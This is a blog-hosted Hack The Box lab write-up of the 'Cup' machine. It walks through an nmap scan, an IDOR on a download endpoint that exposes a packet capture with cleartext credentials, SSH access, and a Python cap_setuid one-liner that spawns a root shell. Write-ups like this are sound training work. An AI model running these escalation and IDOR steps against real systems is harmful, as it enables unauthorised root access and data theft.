<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>Cup - CTF Writeup | zerrox&#39; security blog</title>
  <meta name="author" content="zerrox9">
  
  <meta name="description" content="Writeup for Cup CTF.">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="Cup - CTF Writeup"/>
  <meta property="og:site_name" content="zerrox&#39; security blog"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/project/atom.xml" title="zerrox&#39; security blog" type="application/atom+xml">
  
  
    <link href="/project/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/project/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/project/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/project/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/project/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/project/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/project/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/project/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/project/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 8.1.2"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/project/">zerrox&#39; security blog</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/project/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/project/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/project/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/project/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/project/atom.xml" title="Subscribe me.">
			  <i class=""></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> Cup - CTF Writeup</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  
		 <div class="alert alert-success description">
			<i class="fa fa-info-circle"></i> Writeup for Cup CTF.
		 </div> <!-- alert -->
	  		

	  <h1 id="CTF-Writeup-—-HTB-Machine-10-129-48-150"><a href="#CTF-Writeup-—-HTB-Machine-10-129-48-150" class="headerlink" title="CTF Writeup — HTB Machine (10.129.48.150)"></a>CTF Writeup — HTB Machine (10.129.48.150)</h1><hr>
<h2 id="Reconnaissance"><a href="#Reconnaissance" class="headerlink" title="Reconnaissance"></a>Reconnaissance</h2><p>A full port scan was conducted against the target to enumerate open services.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -T4 -A -sS -sV -p- 10.129.48.150</span><br></pre></td></tr></table></figure>

<p><strong>Results:</strong></p>
<table>
<thead>
<tr>
<th>Port</th>
<th>State</th>
<th>Service</th>
<th>Version</th>
</tr>
</thead>
<tbody><tr>
<td>21&#x2F;tcp</td>
<td>open</td>
<td>ftp</td>
<td>vsftpd 3.0.3</td>
</tr>
<tr>
<td>22&#x2F;tcp</td>
<td>open</td>
<td>ssh</td>
<td>OpenSSH 8.2p1 Ubuntu 4ubuntu0.2</td>
</tr>
<tr>
<td>80&#x2F;tcp</td>
<td>open</td>
<td>http</td>
<td>Gunicorn (Security Dashboard)</td>
</tr>
</tbody></table>
<p>The target is running Linux 5.0–5.14, reachable via 2 hops (RTT ~11ms).</p>
<hr>
<h2 id="Web-Enumeration-—-IDOR"><a href="#Web-Enumeration-—-IDOR" class="headerlink" title="Web Enumeration — IDOR"></a>Web Enumeration — IDOR</h2><p>Navigating to <code>http://10.129.48.150/</code> presents a Security Dashboard web application.</p>
<p>The download endpoint was found to be vulnerable to <strong>Insecure Direct Object Reference (IDOR)</strong> — packet capture files belonging to other users could be accessed by simply manipulating the numeric ID in the URL:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.129.48.150/download/0</span><br></pre></td></tr></table></figure>

<p>Downloading the PCAP file at index <code>0</code> and opening it in Wireshark revealed credentials in cleartext within the captured traffic.</p>
<p><img src="/project/Pasted%20image%2020260504203643.png" alt="Wireshark capture showing credentials"></p>
<hr>
<h2 id="Initial-Access-—-SSH"><a href="#Initial-Access-—-SSH" class="headerlink" title="Initial Access — SSH"></a>Initial Access — SSH</h2><p>Using the credentials extracted from the PCAP file, SSH access was obtained:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh &lt;user&gt;@10.129.48.150</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Privilege-Escalation-—-Python-Capabilities"><a href="#Privilege-Escalation-—-Python-Capabilities" class="headerlink" title="Privilege Escalation — Python Capabilities"></a>Privilege Escalation — Python Capabilities</h2><p>With a foothold on the machine, Linux capabilities were enumerated across the filesystem:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">getcap</span> -r / 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><strong>Output:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/bin/python3.8 = cap_setuid+ep</span><br></pre></td></tr></table></figure>

<p>The <code>cap_setuid</code> capability on <code>python3.8</code> allows the binary to arbitrarily set its UID — including to <code>0</code> (root) — without needing a SUID bit. This is a well-known GTFOBins escalation path.</p>
<p>The following one-liner was used to escalate to root:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/bin/python3.8 -c <span class="string">&#x27;import os; os.setuid(0); os.execl(&quot;/bin/sh&quot;, &quot;sh&quot;)&#x27;</span></span><br></pre></td></tr></table></figure>

<p>A root shell was obtained.</p>
<hr>
<h2 id="Summary"><a href="#Summary" class="headerlink" title="Summary"></a>Summary</h2><table>
<thead>
<tr>
<th>Step</th>
<th>Technique</th>
</tr>
</thead>
<tbody><tr>
<td>Recon</td>
<td>Nmap full port scan</td>
</tr>
<tr>
<td>Foothold</td>
<td>IDOR on <code>/download/&lt;id&gt;</code> — cleartext credentials in PCAP</td>
</tr>
<tr>
<td>Privesc</td>
<td>Python3.8 <code>cap_setuid</code> capability abuse (GTFOBins)</td>
</tr>
</tbody></table>
<hr>
<h2 id="Key-Takeaways"><a href="#Key-Takeaways" class="headerlink" title="Key Takeaways"></a>Key Takeaways</h2><ul>
<li><strong>IDOR vulnerabilities</strong> can expose sensitive files belonging to other users when object references are predictable and access controls are absent.</li>
<li><strong>Capabilities</strong> are a subtle but dangerous misconfiguration — <code>cap_setuid</code> on an interpreter is effectively equivalent to SUID root.</li>
<li>Always enumerate capabilities alongside SUID binaries during privilege escalation.</li>
</ul>

	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/project/2026/05/08/2026-05-08-Web-Attacks-Skill-Assessment/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/project/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/project/2026/05/02/2026-05-02-Cupids-matchmaker/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2026-05-04 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/project/categories/hackthebox/">hackthebox<span>6</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/project/tags/hackthebox/">hackthebox<span>6</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2026 zerrox9's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/project/js/jquery.imagesloaded.min.js"></script>
<script src="/project/js/gallery.js"></script>
<script src="/project/js/bootstrap.min.js"></script>
<script src="/project/js/main.js"></script>
<script src="/project/js/search.js"></script> 


<link rel="stylesheet" href="/project/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/project/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/project/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
